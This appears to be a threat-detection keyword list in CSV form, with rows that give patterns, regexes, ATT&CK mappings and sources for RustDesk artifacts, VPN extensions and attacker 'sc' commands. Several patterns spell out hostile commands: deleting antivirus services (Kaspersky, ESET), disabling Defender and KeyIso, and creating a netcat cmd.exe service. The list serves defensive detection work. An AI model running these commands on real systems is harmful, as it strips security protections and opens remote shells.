"*rundll32*.dll*StartW*",".{0,1000}rundll32.{0,1000}\.dll.{0,1000}StartW.{0,1000}","greyware_tool_keyword","rundll32","Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.","T1218.005 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tool","https://github.com/MichaelKoczwara/Awesome-CobaltStrike-Defence","1","0","N/A","greyware tool - risks of False positive !","N/A","10","1268","190","2022-07-14T07:15:10Z","2021-01-01T16:44:42Z"
"* RustDesk.exe*",".{0,1000}\sRustDesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"* start rustdesk://*",".{0,1000}\sstart\srustdesk\:\/\/.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*/home/user/rustdesk*",".{0,1000}\/home\/user\/rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*/RustDesk.exe*",".{0,1000}\/RustDesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*/rustdesk.git*",".{0,1000}\/rustdesk\.git.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*/rustdesk/rustdesk/releases/*",".{0,1000}\/rustdesk\/rustdesk\/releases\/.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\.rustdesk*",".{0,1000}\\\.rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\\RustDeskIddDriver*",".{0,1000}\\\\RustDeskIddDriver.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\AppData\Local\rustdesk\*",".{0,1000}\\AppData\\Local\\rustdesk\\.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\config\RustDesk.toml*",".{0,1000}\\config\\RustDesk\.toml.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\config\RustDesk_local.*",".{0,1000}\\config\\RustDesk_local\..{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\CurrentVersion\Uninstall\RustDesk*",".{0,1000}\\CurrentVersion\\Uninstall\\RustDesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\librustdesk.dll*",".{0,1000}\\librustdesk\.dll.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\ProgramData\RustDesk\*",".{0,1000}\\ProgramData\\RustDesk\\.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\rustdesk-*-x86_64.exe*",".{0,1000}\\rustdesk\-.{0,1000}\-x86_64\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\RustDesk.exe*",".{0,1000}\\RustDesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\RustDesk.lnk*",".{0,1000}\\RustDesk\.lnk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\RustDesk\query*",".{0,1000}\\RustDesk\\query.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","named pipe","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\RustDeskIddDriver\*",".{0,1000}\\RustDeskIddDriver\\.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*\test_rustdesk.log*",".{0,1000}\\test_rustdesk\.log.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*095e73fc4b115afd77e39a9389ff1eff6bdbff7a*",".{0,1000}095e73fc4b115afd77e39a9389ff1eff6bdbff7a.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*HKEY_CLASSES_ROOT\rustdesk*",".{0,1000}HKEY_CLASSES_ROOT\\rustdesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*info@rustdesk.com*",".{0,1000}info\@rustdesk\.com.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","#email","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*name=""RustDesk Service""*",".{0,1000}name\=\""RustDesk\sService\"".{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rs-ny.rustdesk.com*",".{0,1000}rs\-ny\.rustdesk\.com.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","network request after installation","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RuntimeBroker_rustdesk.exe*",".{0,1000}RuntimeBroker_rustdesk\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDesk Service is running*",".{0,1000}RustDesk\sService\sis\srunning.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk-*.apk*",".{0,1000}rustdesk\-.{0,1000}\.apk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk-*.deb*",".{0,1000}rustdesk\-.{0,1000}\.deb.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk-*.dmg*",".{0,1000}rustdesk\-.{0,1000}\.dmg.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk-*.rpm*",".{0,1000}rustdesk\-.{0,1000}\.rpm.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk-*-win7-install.exe*",".{0,1000}rustdesk\-.{0,1000}\-win7\-install\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDesk.exe *",".{0,1000}RustDesk\.exe\s.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RUSTDESK.EXE-*.pf*",".{0,1000}RUSTDESK\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDesk_hwcodec.*",".{0,1000}RustDesk_hwcodec\..{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDesk_install.bat*",".{0,1000}RustDesk_install\.bat.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk_portable.exe*",".{0,1000}rustdesk_portable\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDesk_rCURRENT.log*",".{0,1000}RustDesk_rCURRENT\.log.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDesk_uninstall.bat*",".{0,1000}RustDesk_uninstall\.bat.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDeskIddDriver.cer*",".{0,1000}RustDeskIddDriver\.cer.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*RustDeskIddDriver.dll*",".{0,1000}RustDeskIddDriver\.dll.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*rustdesk-portable-packer.exe*",".{0,1000}rustdesk\-portable\-packer\.exe.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","1","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*sc start RustDesk*",".{0,1000}sc\sstart\sRustDesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*sc stop RustDesk*",".{0,1000}sc\sstop\sRustDesk.{0,1000}","greyware_tool_keyword","RustDesk","Rustdesk open suorce remote control software abused by scammers","T1021.001 - T1059 - T1078 - T1133 - T1563","TA0001 - TA0002 - TA0005 - TA0008 - TA0011 - TA0010","N/A","Akira - Scattered Spider*","RMM","https://github.com/rustdesk/rustdesk","1","0","N/A","N/A","10","10","71435","8270","2024-08-29T16:37:38Z","2020-09-28T15:36:08Z"
"*hipncndjamdcmphkgngojegjblibadbe*",".{0,1000}hipncndjamdcmphkgngojegjblibadbe.{0,1000}","greyware_tool_keyword","RusVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*cocfojppfigjeefejbpfmedgjbpchcng*",".{0,1000}cocfojppfigjeefejbpfmedgjbpchcng.{0,1000}","greyware_tool_keyword","SaferVPN Proxy","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*net rpc group members 'Domain Users' -W *",".{0,1000}net\srpc\sgroup\smembers\s\'Domain\sUsers\'\s\-W\s.{0,1000}","greyware_tool_keyword","samba","The net command is one of the new features of Samba-3 and is an attempt to provide a useful tool for the majority of remote management operations necessary for common tasks. It is used by attackers to find users list","T1087.002 - T1003.002","TA0007 - TA0006","N/A","N/A","Reconnaissance","https://www.samba.org/samba/docs/old/Samba3-HOWTO/NetCommand.html","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"* /c sc query WinDefend*",".{0,1000}\s\/c\ssc\squery\sWinDefend.{0,1000}","greyware_tool_keyword","sc","Get information about Windows Defender service","T1518.001 - T1049","TA0007 - TA0009","N/A","Snatch","Discovery","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*dnefedniw  eteled cs*",".{0,1000}dnefedniw\s\seteled\scs.{0,1000}","greyware_tool_keyword","sc","script to dismantle complete windows defender protection and even bypass tamper protection  - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","Snatch","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1435","303","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z"
"*echo start > \\.\pipe\winreg*",".{0,1000}echo\sstart\s\>\s\\\\\.\\pipe\\winreg.{0,1000}","greyware_tool_keyword","sc","start the RemoteRegistry service without Admin privileges","T1569.002","TA0004 ","N/A","Snatch","Defense Evasion","https://twitter.com/splinter_code/status/1715876413474025704","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A"
"*sc config KeyIso start= Disabled | sc stop KeyIso*",".{0,1000}sc\sconfig\sKeyIso\sstart\=\sDisabled\s\|\ssc\sstop\sKeyIso.{0,1000}","greyware_tool_keyword","sc","disables and stops the KeyIso service (CNG Key Isolation) potentially interfering with cryptographic functions on the system","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/spicy-bear/Threat-Hunting/blob/2c89b519862672e29547b4db4796caa923044595/95.213.145.101/%D1%81%D0%B8%D1%80/bat/defendermalwar.bat#L3","1","0","N/A","N/A","8","1","3","1","2024-04-03T14:52:39Z","2022-10-31T16:09:50Z"
"*sc create *nc.exe -*cmd.exe*",".{0,1000}sc\screate\s.{0,1000}nc\.exe\s\-.{0,1000}cmd\.exe.{0,1000}","greyware_tool_keyword","sc","create service with netcat","T1569.002 - T1059.003 - T1021.006","TA0004 - TA0002 - TA0011","N/A","Snatch","Persistence","https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*sc delete ""AVP18.0.0""*",".{0,1000}sc\sdelete\s\""AVP18\.0\.0\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""ekrn""*",".{0,1000}sc\sdelete\s\""ekrn\"".{0,1000}","greyware_tool_keyword","sc","deletes the ESET service","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""FirebirdGuardianDefaultInstance""*",".{0,1000}sc\sdelete\s\""FirebirdGuardianDefaultInstance\"".{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""FirebirdServerDefaultInstance""*",".{0,1000}sc\sdelete\s\""FirebirdServerDefaultInstance\"".{0,1000}","greyware_tool_keyword","sc","delete services related to the Firebird database ","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""hvdswvc""*",".{0,1000}sc\sdelete\s\""hvdswvc\"".{0,1000}","greyware_tool_keyword","sc","delete Hyper-V related services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klbackupdisk""*",".{0,1000}sc\sdelete\s\""klbackupdisk\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klbackupflt""*",".{0,1000}sc\sdelete\s\""klbackupflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klflt""*",".{0,1000}sc\sdelete\s\""klflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klhk""*",".{0,1000}sc\sdelete\s\""klhk\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""KLIF""*",".{0,1000}sc\sdelete\s\""KLIF\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klim6""*",".{0,1000}sc\sdelete\s\""klim6\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*sc delete ""klkbdflt""*",".{0,1000}sc\sdelete\s\""klkbdflt\"".{0,1000}","greyware_tool_keyword","sc","delete Kaspersky services","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
